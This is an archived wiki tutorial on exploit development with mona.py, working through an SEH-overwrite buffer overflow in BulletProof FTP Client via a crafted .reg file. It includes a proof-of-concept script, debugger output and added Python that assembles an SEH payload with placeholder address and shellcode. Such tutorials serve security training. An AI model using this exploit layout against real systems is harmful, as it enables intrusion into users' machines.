Test

From Security Weekly Wiki
Revision as of 21:20, 17 October 2013 by Rkornmeyer (talk | contribs)




Getting Dirty With Mona : SEH Overwrite

Despite the title, this isn't something that will legally require opt-in if you are in the UK. This is a quick tutorial about Corelan's mona.py. This tool makes me very excited; even though it's been around for a while, I've just found it! And as far as I can tell, no one here has posted anything about it. So… I'm going to walk through some basic exploit development with mona.py in Immunity Debugger, using the exploit PoC below.

First, we need to go to Corelan to download mona and follow the setup. Honestly, that is a drag and drop of mona.py into Immunity's PyCommands folder plus a few config commands so that mona writes its log files somewhere sensible without overwriting them (for example: !mona config -set workingfolder c:\logs\%p, which gives each debugged process its own output folder).

Now, pretty much every class I've taken on exploit development has relied on Metasploit's pattern_create and pattern_offset to generate a cyclic pattern and then work out where it lands in the stack, the registers and EIP. mona does the same job from inside the debugger, which makes the process simple… Let's take a look:


We tell mona to make us a pattern for the PoC, in this case 552 bytes long:


!mona pc 552


Mona tells us:

====================================================================
 Output generated by mona.py v2.0, rev 447 - Immunity Debugger
 Corelan Team - https://www.corelan.be
====================================================================
 OS : xp, release 5.1.2600
 Process being debugged : _no_name (pid 0)
====================================================================
 2013-10-17 16:25:27
====================================================================

Pattern of 552 bytes :


Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3

We take that pattern, in which no 4-byte sequence repeats within the first 20280 bytes, and drop it into our PoC in place of the original junk, like so:


 #!/usr/bin/python
 # Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
 # Version: 2010.75.0.76
 # Date: 2012-03-11
 # Author: Julien Ahrens
 # Homepage: http://www.inshell.net
 # Software Link: http://www.bpftp.com/
 # Tested on: Windows XP SP3 Professional German
 # Notes: -
 # Howto: Import Reg -> Start App

 file = "poc.reg"

 # 552-byte cyclic pattern from "!mona pc 552", standing in for the original junk
 junk1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"

 # Left over from the original PoC; commented out while only the pattern is used
 # boom = "\x42\x42\x42\x42"
 # junk2 = "\x43" * 100

 # Backslashes in the key path are doubled so Python does not treat "\S" and "\B"
 # as escape sequences
 poc = "Windows Registry Editor Version 5.00\n\n"
 poc = poc + "[HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client 2010\\Options]\n"
 poc = poc + "\"LogFileName\"=\"" + junk1 + "\""

 try:
     print("[*] Creating exploit file...")
     writeFile = open(file, "w")
     writeFile.write(poc)
     writeFile.close()
     print("[*] File successfully created!")
 except IOError as e:
     print("[!] Error while creating file: %s" % e)


We run the script; it writes poc.reg, and the PoC header tells us what to do with it: import the .reg file into the registry, then start the BulletProof FTP client, which reads the overlong LogFileName value back and crashes.

Look at that! Our pattern shows up in EAX and EBP… great… so how does that help us?

I'm not sure; if I were looking at this normally, I would be looking for EIP. However, there are many ways to get our own code to execute… let's ask mona!

We type in :

!mona findmsp

We get the following results:

[+] Looking for cyclic pattern in memory

   Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)
   -  Stack pivot between 172 & 724 bytes needed to land in this pattern
   Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)
   EAX overwritten with normal pattern : 0x41366e41 (offset 408)
   EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)

[+] Examining SEH chain

   SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

[+] Examining stack (entire stack) - looking for cyclic pattern

   Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)
   0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)

[+] Examining stack (entire stack) - looking for pointers to cyclic pattern

   Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)
   0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512
   0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68
   0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68
   0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68
   0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552
   0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552
   0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116
   0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552
   0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116
   0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108
   0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116
   0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292
   0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552


Wow, it took mona a couple of seconds to do that… It might have taken me a while to figure all that out by hand.
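As an added example (my code, not the post's PoC and not mona.py itself), here is what the pattern and the offset lookup actually are in Python: the same Aa0Aa1… cycle that !mona pc produced above, and the search !mona findmsp does when it reports EAX as 0x41366e41 at offset 408. The one gotcha it demonstrates is byte order: the debugger shows the dword 0x41366e41, but in memory that is the bytes 41 6e 36 41, the characters "An6A", and that string is what has to be searched for in the pattern.

```python
# Added example, not code from the original post or from mona.py: a
# re-implementation of the cyclic pattern that `!mona pc` (and Metasploit's
# pattern_create) emits, plus the lookup `!mona findmsp` performs when it
# reports "EAX overwritten with normal pattern : 0x41366e41 (offset 408)".
import string
import struct

# One full cycle: every [upper][lower][digit] triple in order, 26*26*10 triples
# = 20280 bytes. Within a cycle no 4-byte window repeats, which is what makes a
# single crash dump enough to recover where each register/field landed.
_FULL_CYCLE = "".join(
    upper + lower + digit
    for upper in string.ascii_uppercase
    for lower in string.ascii_lowercase
    for digit in string.digits
)


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern (as str)."""
    if length <= 0:
        raise ValueError("length must be positive")
    repeats = length // len(_FULL_CYCLE) + 1
    return (_FULL_CYCLE * repeats)[:length]


def dword_to_chars(value):
    """Bytes of a 32-bit value as they sit in little-endian memory.

    The debugger shows EAX as 0x41366e41; in memory that is 41 6e 36 41,
    i.e. b"An6A", which is the string that has to be searched for.
    """
    return struct.pack("<I", value)


def pattern_offset(value, length=len(_FULL_CYCLE)):
    """Offset of a register/nSEH dword inside the pattern, or None.

    Returns None when the value is not pattern data at all (for example a
    stack address such as EBP's 0x0012fbf4), which is why findmsp reports
    EBP as *pointing at* an offset rather than being overwritten with one.
    """
    haystack = pattern_create(length).encode("ascii")
    idx = haystack.find(dword_to_chars(value))
    return None if idx < 0 else idx


if __name__ == "__main__":
    print(pattern_create(552))
    print("EAX 0x41366e41 -> offset", pattern_offset(0x41366e41))
```

Running it prints the 552-byte pattern shown earlier and reports offset 408 for EAX, matching the findmsp output; feeding it a stack address instead of pattern data returns None.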

In this particular instance, the following is interesting:


[+] Examining SEH chain

   SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data


Let's go look at that in the stack:



Alright, so this is an SEH overwrite exploit; let's ask mona for pop/pop/ret sequences in loaded modules that aren't protected with SafeSEH:


!mona seh


Our list of Pop Pop Ret:


amazing stuff!!!
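As a second added example (again my code, not the post's PoC and not mona output), here is how the pieces that findmsp and !mona seh hand us fit together into the classic SEH overwrite layout: 444 bytes of filler to reach nSEH, a short jump in nSEH, the pop/pop/ret address in the handler slot, then a NOP sled and shellcode. The address 0x10203040 is a placeholder and not one of mona's candidates, and the INT3 bytes stand in for real shellcode. The bad-character list is my assumption about what a quoted string in a .reg file can carry; bytes above 0x7f should still be checked in the debugger, because the .reg text is stored as Unicode and read back through the process's code page.

```python
# Added example, not from the original post: laying out the SEH overwrite
# once `!mona findmsp` has given the nSEH offset (444 here) and `!mona seh`
# has given pop/pop/ret candidates. The handler address and shellcode are
# placeholders, not values taken from BulletProof FTP or from mona output.
import struct

NSEH_OFFSET = 444  # from the findmsp output: nSEH field at offset 444

# Bytes assumed unusable in a REG_SZ value delivered through a .reg file:
# NUL ends the string, '"' and '\' are .reg escape characters, CR/LF end the
# line. This is an assumption about the delivery vector, not a measured
# result; confirm in the debugger that bytes above 0x7f survive as well.
BAD_CHARS = b"\x00\x22\x5c\x0a\x0d"

# "jmp short +6" followed by two NOPs. pop/pop/ret returns into nSEH; the jump
# then hops over the 4-byte handler address that immediately follows nSEH.
NSEH_JUMP = b"\xeb\x06\x90\x90"


def bad_chars_in(buf):
    """Sorted list of BAD_CHARS byte values present in buf (empty if clean)."""
    return sorted(set(buf) & set(BAD_CHARS))


def build_seh_payload(ppr_address, shellcode, nseh_offset=NSEH_OFFSET,
                      nop_sled=8, filler=b"A"):
    """[filler][nSEH = jmp +6][SEH = pop/pop/ret][NOP sled][shellcode]."""
    seh = struct.pack("<I", ppr_address)
    if bad_chars_in(seh):
        raise ValueError("pop/pop/ret address contains bad chars: %r"
                         % bad_chars_in(seh))
    if bad_chars_in(shellcode):
        raise ValueError("shellcode contains bad chars: %r"
                         % bad_chars_in(shellcode))
    return filler * nseh_offset + NSEH_JUMP + seh + b"\x90" * nop_sled + shellcode


def seh_address_in(payload, nseh_offset=NSEH_OFFSET):
    """Read back the handler address the payload installs (sanity check)."""
    return struct.unpack("<I", payload[nseh_offset + 4:nseh_offset + 8])[0]


def reg_file_bytes(payload):
    """Same .reg wrapper as the PoC above, with the payload in LogFileName."""
    head = (b"Windows Registry Editor Version 5.00\n\n"
            b"[HKEY_CURRENT_USER\\Software\\BulletProof Software\\"
            b"BulletProof FTP Client 2010\\Options]\n"
            b'"LogFileName"="')
    return head + payload + b'"\n'


if __name__ == "__main__":
    # 0x10203040 stands in for a pop/pop/ret from a non-SafeSEH module (pick a
    # real one from the `!mona seh` list); INT3s stand in for shellcode so the
    # landing can be confirmed in the debugger before anything else is wired in.
    payload = build_seh_payload(0x10203040, b"\xcc" * 4)
    print("nSEH at %d, SEH=0x%08x, total %d bytes"
          % (NSEH_OFFSET, seh_address_in(payload), len(payload)))
    with open("poc.reg", "wb") as fh:
        fh.write(reg_file_bytes(payload))
```

The bad-character check matters more than it looks: an address such as 0x0BADF00D fails it because its little-endian bytes include 0x0D, so it would be cut off at the line break before it ever reached the handler slot. Pick a candidate from mona's list that passes, and confirm in the debugger that execution stops on the INT3s before swapping in real shellcode.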

Stay tuned for some more exploit fun!!!